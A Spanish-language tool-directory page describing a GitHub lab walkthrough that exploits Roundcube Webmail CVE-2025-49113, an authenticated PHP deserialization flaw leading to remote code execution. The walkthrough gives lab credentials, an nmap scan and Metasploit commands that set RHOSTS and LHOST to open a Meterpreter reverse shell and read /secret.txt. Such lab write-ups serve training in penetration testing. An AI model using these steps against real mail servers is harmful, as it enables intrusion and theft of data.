Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
roundcube-cve-2025-49113-lab — Laboratorio práctico de explotación para Roundcube Webmail CVE-2025-49113 (deserialización de objetos PHP autenticada → RCE) para leer /secret.txt. | Kitploit
Herramientas/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
Labs y Práctica
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Laboratorio práctico de explotación para Roundcube Webmail CVE-2025-49113 (deserialización de objetos PHP autenticada → RCE) para leer /secret.txt.

Ver Repositorio
3hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DESCARGO DE RESPONSABILIDAD: Solo para uso educativo

Laboratorio de RCE en Roundcube Webmail – CVE-2025-49113

Este repositorio documenta mi explotación paso a paso de Roundcube Webmail CVE-2025-49113 en un laboratorio controlado para obtener el secreto almacenado en /secret.txt.

⚠️ Descargo de responsabilidad
Todo el trabajo se realizó contra un entorno de laboratorio/formación que estoy autorizado a probar.
No utilice estas técnicas contra sistemas que no posea o administre.


Desafío

Roundcube Webmail es un cliente de correo electrónico PHP de código abierto basado en navegador que se conecta a buzones de correo a través de IMAP y envía correo a través de SMTP. Comúnmente se ejecuta en Apache o Nginx con MySQL/PostgreSQL/SQLite y se usa ampliamente en entornos de hosting compartido.

Vulnerabilidad – CVE-2025-49113

Todas las versiones de Roundcube hasta 1.6.10 inclusive (y 1.5.x anteriores a 1.5.10) contienen un error crítico en program/actions/settings/upload.php. El parámetro no se valida correctamente, lo que permite a un atacante autenticado desencadenar una y lograr la con privilegios del servidor web.

_from
deserialización insegura de objetos PHP
ejecución remota de código

Credenciales del laboratorio:

  • Nombre de usuario: roundcube
  • Contraseña: rcpass

Objetivo:

¿Cuál es el secreto dentro del archivo /secret.txt?


Entorno de laboratorio

  • Host atacante: Kali / HackerBox con:
    • nmap
    • msfconsole (Metasploit 6)
  • Host objetivo: Roundcube Webmail en 172.20.2.57
  • Exploit utilizado: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Recorrido

Paso 1 – Descubrimiento de servicios con Nmap

Comando: nmap -sV Target Machine

Paso 2 - Localización de un exploit de deserialización de objetos PHP en Metasploit

search php object deserialization

Paso 3 - Configuración del módulo de exploit de Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Paso 4 - Obtención de una sesión de Meterpreter y lectura de /secret.txt

meterpreter > cat /secret.txt

Descargar herramienta